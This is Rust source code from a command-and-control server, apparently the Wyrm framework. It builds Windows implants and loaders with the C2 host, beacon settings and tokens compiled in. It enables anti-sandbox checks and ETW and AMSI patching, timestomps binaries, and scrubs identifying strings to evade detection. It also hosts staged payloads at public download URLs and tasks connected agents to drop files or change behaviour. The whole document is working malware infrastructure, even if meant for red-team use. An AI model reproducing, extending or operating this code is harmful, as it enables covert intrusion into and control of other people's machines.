        StageType::Exe => vec!["--bin", "loader"],
        StageType::Svc => vec!["--bin", "loader_svc"],
        StageType::All => vec![],
    };

    // Check for any feature flags from the profile
    let features: Vec<String> = {
        let mut builder = vec!["--features".to_string()];
        let mut string_builder = String::new();

        if data.antisandbox_ram {
            string_builder.push_str("sandbox_mem,");
        }
        if data.antisandbox_trig {
            string_builder.push_str("sandbox_trig,");
        }
        if data.patch_etw {
            string_builder.push_str("patch_etw,");
        }

        if !string_builder.is_empty() {
            builder.push(string_builder);
            builder
        } else {
            vec![]
        }
    };

    let target = if cfg!(windows) {
        None
    } else {
        Some("x86_64-pc-windows-msvc")
    };

    let mut cmd = if !cfg!(windows) {
        tokio::process::Command::new("cargo-xwin")
    } else {
        tokio::process::Command::new("cargo")
    };

    let exports = parse_exports_to_string_for_env(&data.exports);

    cmd.current_dir("./loader")
        .env("SVC_NAME", data.svc_name.clone())
        .env("EXPORTS_JMP_WYRM", exports.export_only_jmp_wyrm)
        .env("EXPORTS_USR_MACHINE_CODE", exports.export_machine_code)
        .env("EXPORTS_PROXY", exports.export_proxy)
        .env("DLL_PATH", dll_path)
        .env("MUTEX", &data.mutex.clone().unwrap_or_default());

    cmd.arg("build");

    if let Some(t) = target {
        cmd.args(["--target", t]);
    }

    cmd.arg("--release");

    cmd.args(build_as_flags).args(features);

    cmd.output().await
}

/// Builds the specified agent as a PE.
///
/// # Important
/// The PE name passed into this function should NOT include its extension.
pub async fn compile_agent(
    data: &NewAgentStaging,
    stage_type: StageType,
) -> Result<std::process::Output, std::io::Error> {
    //
    // Try insert the data into the db. We have some constraints on the db so that it cannot stage
    // at duplicate endpoints, or with duplicate names, etc.
    //

    if stage_type == StageType::All {
        return Err(io::Error::other("StageType::All not supported"));
    }

    let pe_name = validate_extension(&data.pe_name, stage_type);

    // Check for any feature flags
    let features: Vec<String> = {
        let mut builder = vec!["--features".to_string()];
        let mut string_builder = String::new();

        if data.antisandbox_ram {
            string_builder.push_str("sandbox_mem,");
        }
        if data.antisandbox_trig {
            string_builder.push_str("sandbox_trig,");
        }
        if data.patch_etw {
            string_builder.push_str("patch_etw,");
        }
        if data.patch_amsi {
            string_builder.push_str("patch_amsi,");
        }

        if !string_builder.is_empty() {
            builder.push(string_builder);
            builder
        } else {
            vec![]
        }
    };

    let build_as_flags = match stage_type {
        StageType::Dll => vec!["--lib"],
        StageType::Exe => vec!["--bin", "implant"],
        StageType::Svc => vec!["--bin", "implant_svc"],
        StageType::All => vec![],
    };

    //
    // Now we want to actually build the agent itself. We will do this on the C2, building the
    // agent via the local command shell.
    //
    // As operators shouldn't be doing this frequently, I can't see much harm in terms of CPU and
    // memory, but this may need to be profiled.
    //
    // We are also relying on the C2 being run from the correct point as pathing here is going to be
    // relative to allow flexibility on server installations. The C2 must run from the c2 crate directly
    // for the pathing to work.
    //

    let toolchain = "nightly";
    let target = if cfg!(windows) {
        None
    } else {
        Some("x86_64-pc-windows-msvc")
    };

    let mut cmd = if !cfg!(windows) {
        tokio::process::Command::new("cargo-xwin")
    } else {
        tokio::process::Command::new("cargo")
    };

    let default_spawn_as = data.default_spawn_as.clone().unwrap_or_default();

    let c2_endpoints = data
        .c2_endpoints
        .iter()
        .map(|e| e.to_string() + ",")
        .collect::<String>();

    let jitter = data.jitter.unwrap_or_default();

    let exports = parse_exports_to_string_for_env(&data.exports);
    let wofs = match &data.wofs {
        Some(w) => w
            .iter()
            .map(|folder| format!("{}/{folder};", WOFS_PATH))
            .collect::<String>(),
        None => String::new(),
    };

    cmd.env("RUSTUP_TOOLCHAIN", toolchain)
        .current_dir("./implant")
        .env("AGENT_NAME", &data.implant_name)
        .env("PE_NAME", pe_name)
        .env("DEF_SLEEP_TIME", data.default_sleep_time.to_string())
        .env("C2_HOST", &data.c2_address)
        .env("C2_URIS", c2_endpoints)
        .env("C2_PORT", data.port.to_string())
        .env("JITTER", jitter.to_string())
        .env("SVC_NAME", data.svc_name.clone())
        .env("USERAGENT", &data.useragent)
        .env("STAGING_URI", &data.staging_endpoint)
        .env("EXPORTS_JMP_WYRM", exports.export_only_jmp_wyrm)
        .env("EXPORTS_USR_MACHINE_CODE", exports.export_machine_code)
        .env("EXPORTS_PROXY", exports.export_proxy)
        .env("SECURITY_TOKEN", &data.agent_security_token)
        .env("STAGE_TYPE", format!("{stage_type}"))
        .env("DEFAULT_SPAWN_AS", default_spawn_as)
        .env("WOF", wofs)
        .env("MUTEX", &data.mutex.clone().unwrap_or_default());

    cmd.arg("build");

    if let Some(t) = target {
        cmd.args(["--target", t]);
    }

    if !data.build_debug {
        cmd.arg("--release");
    }

    cmd.args(build_as_flags).args(features);

    cmd.output().await
}

pub async fn post_process_pe_on_disk(dest: &Path, data: &NewAgentStaging, stage_type: StageType) {
    //
    // If the user profile specifies to timestomp the binary, then try do that - if it fails we do not want to allow
    // the bad file to be returned to the user.
    //
    if let Some(ts) = data.timestomp.as_ref() {
        if let Err(e) = timestomp_binary_compile_date(ts, &dest).await {
            let msg = format!("Could not timestomp binary {}, {e}", dest.display());
            log_error_async(&msg).await;
        }
    }

    //
    // Scrub implant.dll out
    //
    if stage_type == StageType::Dll {
        if let Err(e) = scrub_strings(&dest, b"implant.dll\0", None).await {
            log_error_async(&format!("Failed to scrub implant.dll. {e}")).await;
        };
    }

    //
    // Scrub user defined strings
    //
    if let Some(stomp) = &data.string_stomp {
        if let Some(inner) = &stomp.remove {
            for needle in inner {
                if let Err(e) = scrub_strings(&dest, needle.as_bytes(), None).await {
                    log_error_async(&format!(
                        "Failed to scrub string {needle} from {}. {e}",
                        dest.display()
                    ))
                    .await;
                };
            }
        }

        if let Some(inner) = &stomp.replace {
            for (needle, repl) in inner {
                if let Err(e) = scrub_strings(&dest, needle.as_bytes(), Some(repl.as_bytes())).await
                {
                    log_error_async(&format!(
                        "Failed to replace string {needle} from {}. {e}",
                        dest.display()
                    ))
                    .await;
                };
            }
        }
    }
}

pub async fn write_implant_to_tmp_folder<'a>(
    profile: &Profile,
    save_path: &'a PathBuf,
    implant_profile_name: &str,
    state: State<Arc<AppState>>,
) -> Result<(), String> {
    //
    // Transform the profile into a valid `NewAgentStaging`
    //
    let data: NewAgentStaging = match profile.as_staged_agent(implant_profile_name, StageType::All)
    {
        WyrmResult::Ok(d) => d,
        WyrmResult::Err(e) => {
            let _ = remove_dir(&save_path).await?;
            let msg = format!("Error constructing a NewAgentStaging. {e:?}");
            log_error_async(&msg).await;
            return Err(msg);
        }
    };

    //
    // For every build type, build it - we manually specify the loop size here so as more
    // build options are added, the loop will need to be increased to accommodate.
    //
    for i in 0..3 {
        let stage_type = match i {
            0 => StageType::Exe,
            1 => StageType::Dll,
            2 => StageType::Svc,
            _ => unreachable!(),
        };

        // Actually try build with cargo
        let cmd_build_output = compile_agent(&data, stage_type).await;

        if let Err(e) = cmd_build_output {
            let msg = &format!("Failed to build agent. {e}");
            let _ = remove_dir(&save_path).await?;
            return Err(msg.to_owned());
        }

        let output = cmd_build_output.unwrap();
        if !output.status.success() {
            let msg = &format!(
                "Failed to build agent. {:#?}",
                String::from_utf8_lossy(&output.stderr),
            );

            let _ = remove_dir(&save_path).await?;

            return Err(msg.to_owned());
        }

        //
        // Move the built implant to where the operator requested it to be built in
        //
        let dir_name = {
            match data.build_debug {
                true => "debug",
                false => "release",
            }
        };

        let src_dir = if cfg!(windows) {
            PathBuf::from(format!("./implant/target/{dir_name}"))
        } else {
            PathBuf::from(format!(
                "./implant/target/x86_64-pc-windows-msvc/{dir_name}"
            ))
        };

        let out_dir = Path::new(&save_path);
        let src = match stage_type {
            StageType::Dll => src_dir.join("implant.dll"),
            StageType::Exe => src_dir.join("implant.exe"),
            StageType::Svc => src_dir.join("implant_svc.exe"),
            StageType::All => unreachable!(),
        };

        let mut dest = out_dir.join(&data.pe_name);

        if !(match stage_type {
            StageType::Dll => dest.add_extension("dll"),
            StageType::Exe => dest.add_extension("exe"),
            StageType::Svc => dest.add_extension("svc"),
            StageType::All => unreachable!(),
        }) {
            let msg = format!("Failed to add extension to local file. {dest:?}");
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        // Error check..
        if let Err(e) = tokio::fs::rename(&src, &dest).await {
            let cwd = current_dir().expect("could not get cwd");
            let msg = format!(
                "Failed to rename built agent - it is *possible* you interrupted the request/page, looking for: {}, to rename to: {}. Cwd: {cwd:?} {e}",
                src.display(),
                dest.display()
            );
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        //
        // Update state to include a new endpoint for the listeners
        //
        if let Err(e) = is_download_staging_url_error(&data, &state).await {
            let msg = format!(
                "The download URL matches an existing one, or a URL which is used for agent check-in, \
                this is not permitted. Kind: {e:?}"
            );
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        }

        post_process_pe_on_disk(&dest, &data, stage_type).await;

        //
        // Build the loader for the DLL
        //
        if stage_type == StageType::Dll {
            let p = format!("{}/{}.dll", FULLY_QUAL_PATH_TO_FILE_BUILD, data.pe_name);
            let dll_path = PathBuf::from(p);

            if !dll_path.exists() {
                panic!(
                    "DLL path for the raw binary did not exist. This is not acceptable. Expected path: {}",
                    dll_path.display()
                );
            }

            write_loader_to_tmp(profile, save_path, implant_profile_name, &dll_path).await?;
        }
    }

    Ok(())
}

/// Validates the extension of the build target matches that expected by the operator
/// after building takes place.
fn validate_extension(name: &String, expected_type: StageType) -> String {
    let mut new_name = String::from(name);

    match expected_type {
        StageType::Dll => {
            if !new_name.ends_with(".dll") && (name.ends_with(".exe") || name.ends_with(".svc")) {
                let _ = new_name.replace(".exe", "");
                let _ = new_name.replace(".svc", "");
                new_name.push_str(".dll");
            } else {
                new_name.push_str(".dll");
            }
        }
        StageType::Exe => {
            if !new_name.ends_with(".exe") && (name.ends_with(".dll") || name.ends_with(".svc")) {
                let _ = new_name.replace(".dll", "");
                let _ = new_name.replace(".svc", "");
                new_name.push_str(".exe");
            } else {
                new_name.push_str(".exe");
            }
        }
        StageType::Svc => {
            if !new_name.ends_with(".exe") && (name.ends_with(".dll") || name.ends_with(".svc")) {
                let _ = new_name.replace(".dll", "");
                let _ = new_name.replace(".exe", "");
                new_name.push_str(".svc");
            } else {
                new_name.push_str(".svc");
            }
        }
        StageType::All => unreachable!(),
    }

    new_name
}

/// Prints an error to the C2 console and returns a formatted error.
///
/// **IMPORTANT**: This function will also delete the staged_agent row from the database by it's `implant_name`.
async fn stage_new_agent_error_printer(
    message: &str,
    uri: &str,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    log_error_async(message).await;
    let _ = state.db_pool.delete_staged_resource_by_uri(uri).await;

    let serialised = serde_json::to_value(WyrmResult::Err::<String>(message.to_string())).unwrap();

    Some(serialised)
}

/// Stages a file uploaded to the C2 by an admin which will be made available for public download
/// at a specified API endpoint.
pub async fn stage_file_upload_from_users_disk(
    data: FileUploadStagingFromClient,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    let out_dir = Path::new(FILE_STORE_PATH);
    let dest = out_dir.join(&data.download_name);

    if let Err(e) = fs::write(&dest, &data.file_data).await {
        let serialised = serde_json::to_value(WyrmResult::Err::<String>(format!(
            "Failed to write file on C2: {e:?}",
        )))
        .unwrap();

        return Some(serialised);
    }

    let agent_stage_template =
        NewAgentStaging::from_staged_file_metadata(&data.api_endpoint, &data.download_name);

    //
    // Try insert into the database, following that, deconflict the download URI and add it into the in-memory
    // list.
    //
    if let Err(e) = state.db_pool.add_staged_agent(&agent_stage_template).await {
        log_error_async(&format!("Failed to insert row in db: {e:?}")).await;
        let serialised = serde_json::to_value(WyrmResult::Err::<String>(format!(
            "Failed to insert row in db for new staged agent: {e:?}",
        )))
        .unwrap();

        return Some(serialised);
    };

    if let Err(e) = add_api_endpoint_for_staged_resource(&agent_stage_template, state.clone()).await
    {
        return stage_new_agent_error_printer(
            &format!(
                "The download URL matches an existing one, or a URL which is used for agent \
                check-in, this is not permitted. Kind: {e:?}"
            ),
            &data.download_name,
            state,
        )
        .await;
    };

    let serialised = match serde_json::to_value(WyrmResult::Ok(format!(
        "File successfully uploaded, and is being served at /{}. File name: {}",
        data.api_endpoint, data.download_name,
    ))) {
        Ok(s) => s,
        Err(e) => {
            return stage_new_agent_error_printer(
                &format!("Failed to serialise response. {e}"),
                &data.download_name,
                state,
            )
            .await;
        }
    };

    Some(serialised)
}


================================================
FILE: c2/src/admin_task_dispatch/mod.rs
================================================
use std::{
    path::{Path, PathBuf},
    sync::Arc,
};

use crate::{
    DB_EXPORT_PATH, FILE_STORE_PATH,
    app_state::{AppState, DownloadEndpointData},
    logging::{log_error, log_error_async},
};
use axum::extract::State;
use chrono::{SecondsFormat, Utc};
use serde_json::Value;
use shared::tasks::{
    Command, DELIM_FILE_DROP_METADATA, FileDropMetadata, NewAgentStaging, WyrmResult,
};
use shared_c2_client::{AgentC2MemoryNotifications, MapToMitre, TaskExport};
use tokio::{fs, io::AsyncWriteExt};

pub mod dispatch_table;
mod execute;
pub mod implant_builder;

async fn remove_dir(save_path: impl AsRef<Path>) -> Result<(), String> {
    if let Err(e) = fs::remove_dir_all(save_path).await {
        let msg = format!("Failed to remove directory for tmp after building profiles. {e}");
        log_error_async(&msg).await;
        return Err(msg);
    }

    Ok(())
}

async fn remove_file(file_path: impl AsRef<Path>) -> Result<(), String> {
    if let Err(e) = fs::remove_file(file_path.as_ref()).await {
        let msg = format!("Failed to remove file for tmp.7z after building profiles. {e}");
        log_error_async(&msg).await;
        return Err(msg);
    }

    Ok(())
}

async fn list_agents(state: State<Arc<AppState>>) -> Option<Value> {
    let mut new_agents: Vec<AgentC2MemoryNotifications> = Vec::new();

    let agents = state.connected_agents.snapshot_agents().await;
    for agent in agents {
        let last_check_in = agent
            .last_checkin_time
            .to_rfc3339_opts(chrono::SecondsFormat::Secs, true);

        let formatted = format!(
            "\t{}\t\t{}\t{}\t{}",
            agent.uid, last_check_in, agent.first_run_data.b, agent.first_run_data.c,
        );

        let new_messages = pull_notifications_for_agent(agent.uid.clone(), state.clone()).await;
        new_agents.push((formatted, agent.is_stale, new_messages));
    }

    Some(serde_json::to_value(&new_agents).expect("could not serialise"))
}

/// Inserts a new task for the agent where the format of the task metadata is already valid. This function is
/// just a wrapper for a database interaction.
///
/// # Returns
/// None - the task is queued and the resulting data can be made available with the 'n' function on the cli.
async fn task_agent<T: Into<String>>(
    command: Command,
    metadata: Option<T>,
    uid: String,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    let metadata = metadata.map(|t| t.into());

    state
        .db_pool
        .add_task_for_agent_by_id(&uid, command, metadata)
        .await
        .unwrap();

    None
}

/// Inserts a new task in the db instructing the agent to alter its sleep time. This will also be reflected in the
/// agent's metadata on the agent db entry for persistence.
async fn task_agent_sleep(time: i64, uid: String, state: State<Arc<AppState>>) -> Option<Value> {
    let time_as_str = time.to_string();
    state
        .db_pool
        .update_agent_sleep_time(&uid, time)
        .await
        .unwrap();

    state
        .db_pool
        .add_task_for_agent_by_id(&uid, Command::Sleep, Some(time_as_str))
        .await
        .unwrap();

    // We dont have any metadata to send back to the client, so an empty vec is sufficient
    None
}

/// Queries the database for the pending notifications for a given agent, and then marks them as pulled.
async fn pull_notifications_for_agent(uid: String, state: State<Arc<AppState>>) -> Option<Value> {
    // Used to store the completed ID's we took from the DB to mark them as
    // pulled.
    let mut ids = Vec::new();

    //
    // Pulling the notifications will also mark as complete; so grab them and return
    //

    let agent_notifications = match state.db_pool.pull_notifications_for_agent(&uid).await {
        Ok(inner) => {
            let inner = inner.map(|t| {
                t.iter().for_each(|n| ids.push(n.completed_id));
                serde_json::to_value(&t).unwrap()
            });
            if inner.is_none() {
                return inner;
            } else {
                inner
            }
        }
        Err(e) => {
            log_error_async(&format!(
                "Could not pull notifications for agent {uid}. {e}"
            ))
            .await;
            return None;
        }
    };
    agent_notifications
}

/// Returns the time of the server in UTC
fn show_server_time() -> Option<Value> {
    let time_now = Utc::now();
    let time_now_snipped = time_now.to_rfc3339_opts(SecondsFormat::Secs, true);

    match serde_json::to_value(&time_now_snipped) {
        Ok(time) => Some(time),
        Err(e) => {
            let s = format!("Failed to serialise server time. {e}");
            Some(serde_json::to_value(&s).unwrap())
        }
    }
}

/// Lists staged resources on the C2, such as staged agents
async fn list_staged_resources(state: State<Arc<AppState>>) -> Option<Value> {
    let results = match state.db_pool.get_staged_agent_data().await {
        Ok(r) => WyrmResult::Ok(r),
        Err(e) => {
            log_error_async(&format!("Failed to list resources: {e:?}")).await;
            WyrmResult::Err(e.to_string())
        }
    };

    let ser = serde_json::to_value(results).unwrap();

    Some(ser)
}

/// Deletes a staged resource from the database by its internal stage name
async fn delete_staged_resources(
    state: State<Arc<AppState>>,
    download_endpoint: String,
) -> Option<Value> {
    // Delete from db
    let results = state
        .db_pool
        .delete_staged_resource_by_uri(&download_endpoint)
        .await
        .unwrap();

    {
        // remove the download stage from the in memory list
        let mut lock = state.endpoints.write().await;
        lock.download_endpoints.remove(&download_endpoint);
    }

    // Delete from disk
    let mut file_to_delete = PathBuf::from(FILE_STORE_PATH);
    file_to_delete.push(results);
    tokio::fs::remove_file(&file_to_delete).await.unwrap();

    let ser = serde_json::to_value(()).unwrap();

    Some(ser)
}

async fn remove_agent_from_list(state: State<Arc<AppState>>, agent_name: String) -> Option<Value> {
    state.connected_agents.remove_agent(&agent_name).await;

    None
}

/// Error state which could occur when trying to add a stage or file to the C2
#[derive(Debug)]
enum StageError {
    EndpointExistsDownload,
    EndpointExistsCheckIn,
}

/// Adds an API endpoint for public use on the C2 which relates to a custom file / a new agent uploaded
/// by the admin on the client.
///
/// The function handles errors and deconflictions, ensuring that we do not cause any duplication. If no errors are
/// encountered, it will insert the relevant data into the in-memory structures.
///
/// This function does **not** handle database insertions, and assumes they have already been done / will be done
/// hereafter.
///
/// # Returns
/// - `Ok`: If successful, unit Ok is returned
/// - `Err`: If there is an error adding a URI, the error is returned as a [`StageError`]
async fn add_api_endpoint_for_staged_resource(
    data: &NewAgentStaging,
    state: State<Arc<AppState>>,
) -> Result<(), StageError> {
    // Check we dont overlap incompatible URI's
    is_download_staging_url_error(data, &state).await?;

    let mut server_endpoints = state.endpoints.write().await;

    server_endpoints.download_endpoints.insert(
        data.staging_endpoint.clone(),
        DownloadEndpointData::new(&data.pe_name, &data.implant_name, None),
    );

    Ok(())
}

/// Checks whether a staged URI exists in a way which is incompatible. For example, you cannot have two
/// download URI's that overlap, and you cannot have a checkin URI overlapping with a download URI.
async fn is_download_staging_url_error(
    data: &NewAgentStaging,
    state: &State<Arc<AppState>>,
) -> Result<(), StageError> {
    //
    // Check for conflicts with download and staging API's, that is what we look for in the first
    // three vars, `c2_conflicts_download`, `staging_conflicts_c2` & `staging_conflicts_self`
    //
    let server_endpoints = state.endpoints.read().await;
    for e in &data.c2_endpoints {
        if server_endpoints.download_endpoints.contains_key(e) == true {
            return Err(StageError::EndpointExistsDownload);
        }
    }

    // Check the existing C2 endpoints with the proposed staging endpoint (only in the case
    // where the operator is building manually as opposed to the profile). Building via the profile
    // currently results in a empty string "", which is why we do this check.
    if !data.staging_endpoint.is_empty()
        && server_endpoints
            .c2_endpoints
            .contains(&data.staging_endpoint)
    {
        return Err(StageError::EndpointExistsCheckIn);
    }

    if server_endpoints
        .download_endpoints
        .contains_key(&data.staging_endpoint)
    {
        return Err(StageError::EndpointExistsDownload);
    }

    Ok(())
}

/// Handler for instructing the agent to drop a file to disk.
async fn drop_file_handler(
    uid: Option<String>,
    mut data: FileDropMetadata,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    // check we dont have the delimiter in the input
    if data.download_name.contains(DELIM_FILE_DROP_METADATA)
        || data.internal_name.contains(DELIM_FILE_DROP_METADATA)
        || data
            .download_uri
            .as_deref()
            .unwrap_or_default()
            .contains(DELIM_FILE_DROP_METADATA)
    {
        return Some(
            serde_json::to_value(WyrmResult::Err::<String>(format!(
                "Content cannot contain {DELIM_FILE_DROP_METADATA}"
            )))
            .unwrap(),
        );
    }

    let Some(download_uri) = state
        .endpoints
        .read()
        .await
        .find_format_download_endpoint(&data.internal_name)
    else {
        let msg = format!(
            "Could not find staged file when instructing agent to drop a file to disk. Looking for file name: '{}' \
            but it does not exist in memory.",
            data.internal_name
        );
        log_error_async(&msg).await;
        return Some(serde_json::to_value(WyrmResult::Err::<String>(msg)).unwrap());
    };

    data.download_uri = Some(download_uri);

    task_agent::<String>(Command::Drop, Some(data.into()), uid.unwrap(), state).await
}

/// Exports the completed tasks on an agent (by its ID) to a json file in the C2 filesystem
async fn export_completed_tasks_to_json(uid: String, state: State<Arc<AppState>>) -> Option<Value> {
    //
    // This whole block here just unwraps explicitly twice safely through matches trying to get the inner
    // data. If there was an error or there was no data, this is handled and the function will immediately
    // return. Using thiserror or using maps may be a little nicer...
    //
    let results = match state.db_pool.get_agent_export_data(uid.as_str()).await {
        Ok(r) => match r {
            Some(r) => {
                if r.is_empty() {
                    let msg = format!("Tasks for implant: {uid} were empty");
                    log_error(&msg);
                    return Some(serde_json::to_value(msg).unwrap());
                }

                r
            }
            None => {
                let msg = format!("Tasks for implant: {uid} were empty");
                log_error(&msg);
                return Some(serde_json::to_value(msg).unwrap());
            }
        },
        Err(e) => {
            let msg = format!(
                "Error encountered for implant: {uid} when trying to fetch completed tasks. {e}"
            );
            log_error(&msg);
            return Some(serde_json::to_value(msg).unwrap());
        }
    };

    // Serialise
    let mut results_with_mitre: Vec<TaskExport> = Vec::with_capacity(results.len());

    for task in &results {
        results_with_mitre.push(TaskExport::new(task, task.command.map_to_mitre()));
    }

    let json_export = serde_json::to_string(&results_with_mitre)
        .map_err(|e| {
            let msg = format!("Could not serialise db results for agent: {uid}. {e}");
            log_error(&msg);

            Some(serde_json::to_value(msg).unwrap())
        })
        .unwrap();

    //
    // Try write the data to the fs
    //
    let mut path = PathBuf::from(DB_EXPORT_PATH);
    path.push(&uid);
    path.add_extension("json");

    let mut file = tokio::fs::OpenOptions::new()
        .write(true)
        .read(true)
        .create(true)
        .truncate(true)
        .open(&path)
        .await
        .map_err(|e| {
            let msg = format!(
                "Could not create db export file on fs for agent: {uid}. Path: {}, {e}",
                path.display()
            );
            log_error(&msg);
            Some(serde_json::to_value(msg).unwrap())
        })
        .unwrap();

    if let Err(e) = file.write(json_export.as_bytes()).await {
        log_error(&format!(
            "Could not write to output file {} for agent: {uid}. {e}",
            path.display()
        ));
        return None;
    };

    Some(serde_json::to_value(format!("File exported as {uid}")).unwrap())
}


================================================
FILE: c2/src/agents.rs
================================================
use std::{collections::HashMap, sync::Arc};

use axum::http::HeaderMap;
use chrono::{DateTime, Duration, Utc};
use serde::{Deserialize, Serialize};
use shared::tasks::{Command, FirstRunData, Task, tasks_contains_kill_agent};
use tokio::{sync::RwLock, time::timeout};

use crate::{db::Db, logging::log_error_async};

#[derive(Serialize, Deserialize, Clone)]
pub struct Agent {
    pub uid: String,
    pub sleep: u64,
    pub first_run_data: FirstRunData,
    pub last_checkin_time: DateTime<Utc>,
    pub is_stale: bool,
}

impl Agent {
    /// Creates a new agent by querying the database. If the agent exists in the database, that will be
    /// returned, otherwise, a new agent will be inserted and that will be returned.
    async fn from_first_run_data(
        id: &str,
        db: &Db,
        frd: FirstRunData,
    ) -> Result<(Agent, Option<Vec<Task>>), String> {
        match db.get_agent_with_tasks_by_id(id, frd.clone()).await {
            Ok((agent, tasks)) => Ok((agent, tasks)),
            Err(e) => match e {
                sqlx::Error::RowNotFound => {
                    // Add the new agent into the db, and also return with it an empty vec
                    let new_agent = db
                        .insert_new_agent(id, frd)
                        .await
                        .map_err(|e| e.to_string())?;
                    return Ok((new_agent, None));
                }
                _ => {
                    return Err(e.to_string());
                }
            },
        }
    }

    pub fn get_config_data(&self) -> Vec<Task> {
        //
        // Here we. can push any tasks to the queue which we want the implant to execute at the point
        // of its first run, to set up any of its environment / runtime related tasks. For example, we can
        // set its sleep to be the last sleep setting the operator changed it to, where that would differ
        // from what is hardcoded.
        //

        vec![Task {
            id: 0,
            command: Command::UpdateSleepTime,
            metadata: Some(self.sleep.to_string()),
            completed_time: 0,
        }]
    }
}

type AgentHandle = Arc<RwLock<Agent>>;

/// AgentList holds data pertaining to the in-memory representation of all active agents connected
/// to the C2.
pub struct AgentList {
    // Each agent is represented by a HashMap where the Key is the ID, and the value is the Agent
    agents: RwLock<HashMap<String, AgentHandle>>,
}

impl AgentList {
    pub fn default() -> Self {
        Self {
            agents: RwLock::new(HashMap::new()),
        }
    }

    async fn snapshot_handles(&self) -> Vec<AgentHandle> {
        let lock = self.agents.read().await;
        lock.values().cloned().collect()
    }

    pub async fn snapshot_agents(&self) -> Vec<Agent> {
        let handles = self.snapshot_handles().await;
        let mut agents = Vec::with_capacity(handles.len());

        for handle in handles {
            let agent = handle.read().await;
            agents.push(agent.clone());
        }

        agents
    }

    /// Enumerates over all agents, determines whether an it is stale by calculating if we have
    /// gone past the expected check-in time of the agent by some time, `n` (where `n` is in seconds).
    pub async fn mark_agents_stale(&self) {
        let handles = self.snapshot_handles().await;

        for handle in handles {
            let (sleep, last_checkin_time) = {
                let lock = handle.read().await;
                (lock.sleep, lock.last_checkin_time)
            };

            let margin = Duration::seconds(calculate_max_time_till_stale(sleep).await);
            let now: DateTime<Utc> = Utc::now();

            let mut lock = handle.write().await;
            lock.is_stale = last_checkin_time + Duration::seconds(sleep as _) + margin < now;
        }
    }

    /// Gets an [`Agent`] from the HTTP request headers; if no such agent is currently connected
    /// an agent will be returned and added to the live list of agents.
    ///
    /// # Returns
    /// - An owned **copy** of the agent in the live list
    /// - An option of a Vector of Tasks, to be completed by the agent
    pub async fn get_agent_and_tasks_by_header(
        &self,
        headers: &HeaderMap,
        db: &Db,
        first_run_data: Option<FirstRunData>,
    ) -> Result<(Agent, Option<Vec<Task>>), String> {
        // Lookup the agent ID by extracting it from the headers
        let agent_id = extract_agent_id(headers)?;

        let mut re_request_frd: bool = false;

        //
        // Get or insert the agent
        //
        let existing = {
            let lock = self.agents.read().await;
            lock.get(&agent_id).cloned()
        };

        let handle: AgentHandle = if let Some(entry) = existing {
            entry
        } else {
            let Ok(db_call) = timeout(
                tokio::time::Duration::from_secs(5),
                Agent::from_first_run_data(
                    &agent_id,
                    db,
                    first_run_data.clone().unwrap_or_default(),
                ),
            )
            .await
            else {
                return Err("DB timeout in critical path".to_string());
            };

            let (new_agent, _) = match db_call {
                Ok(result) => result,
                Err(e) => {
                    return Err(format!("Failed to complete from_first_run_data. {e}"));
                }
            };

            let arc = Arc::new(RwLock::new(new_agent));
            let mut lock = self.agents.write().await;
            if let Some(existing) = lock.get(&agent_id) {
                Arc::clone(existing)
            } else {
                re_request_frd = first_run_data.is_none();
                lock.insert(agent_id.clone(), arc.clone());
                arc
            }
        };

        //
        // Update in place
        //

        let mut agent_for_db = {
            let mut lock = handle.write().await;
            if let Some(frd) = first_run_data {
                lock.first_run_data = frd;
            }
            lock.clone()
        };

        if let Err(e) = db.update_agent_checkin_time(&mut agent_for_db).await {
            return Err(format!("Failed to update checkin time. {e}"));
        }

        {
            let mut lock = handle.write().await;
            lock.last_checkin_time = agent_for_db.last_checkin_time;
            lock.first_run_data = agent_for_db.first_run_data.clone();
        }

        let Ok(mut tasks) = db.get_tasks_for_agent_by_uid(&agent_id).await else {
            return Err("Failed to get tasks for agent by UID.".to_string());
        };

        // Here is where we handle the case of needing to task first run data again
        if re_request_frd {
            let task = Task {
                id: 0,
                command: Command::AgentsFirstSessionBeacon,
                metadata: None,
                completed_time: 0,
            };

            match tasks.as_mut() {
                Some(tasks) => {
                    tasks.push(task);
                }
                None => tasks = Some(vec![task]),
            }
        }

        let snapshot = {
            let agent_guard = handle.read().await;
            agent_guard.clone()
        };

        Ok((snapshot, tasks))
    }

    pub async fn contains_agent_by_id(&self, id: &str) -> bool {
        let lock = self.agents.read().await;
        lock.contains_key(id)
    }

    pub async fn remove_agent(&self, id: &str) {
        let mut lock = self.agents.write().await;
        lock.remove(id);
    }
}

/// Extracts the agent ID from the headers.
///
/// # Panics
/// This function will panic the request should the agent ID (or any WWW-Authenticate header) not be found.
/// This is acceptable as we don't want to handle these requests..
pub fn extract_agent_id(headers: &HeaderMap) -> Result<String, String> {
    let Some(result) = headers.get("WWW-Authenticate") else {
        return Err("No agent id found in request".to_string());
    };

    let Ok(result) = result.to_str() else {
        return Err("Could not convert agent header to str".to_string());
    };

    Ok(result.to_string())
}

/// Checks whether the agent has the kill command as part of its tasks.
///
/// If the command is present, the agent will be removed from the list of active agents.
pub async fn handle_kill_command(
    agent_list: Arc<AgentList>,
    agent: &Agent,
    tasks: &Option<Vec<Task>>,
) {
    if tasks.is_none() {
        return;
    }

    if let Some(t) = tasks.as_ref() {
        if tasks_contains_kill_agent(t) {
            agent_list.remove_agent(&agent.uid).await;
        }
    }
}

/// Calculates the maximum time the agent can sleep for before becoming stale, and is set to
/// double the sleep time.
///
/// # Returns
/// An `i64` of the time to wait before marking as stale. If there is an integer error (value becomes
/// negative, overflows) during operations, an error will be logged and instead the return value will be
/// the sleep time of the agent + 1 hr.
async fn calculate_max_time_till_stale(sleep: u64) -> i64 {
    const MAX_SLEEP_TILL_STALE_MUL: u64 = 2;

    let res = match sleep.checked_mul(MAX_SLEEP_TILL_STALE_MUL) {
        Some(s) => s,
        None => {
            log_error_async(&format!(
                "Failed to multiply sleep time from input time: {sleep}."
            ))
            .await;

            sleep
        }
    } as i64;

    if res.is_negative() {
        log_error_async(&format!("Sleep time was negative time: {res}.")).await;

        return sleep as i64;
    }

    res
}


================================================
FILE: c2/src/api/admin_routes.rs
================================================
use std::{net::SocketAddr, sync::Arc};

use crate::{
    AUTH_COOKIE_NAME, COOKIE_TTL,
    admin_task_dispatch::{dispatch_table::admin_dispatch, implant_builder::build_all_bins},
    app_state::AppState,
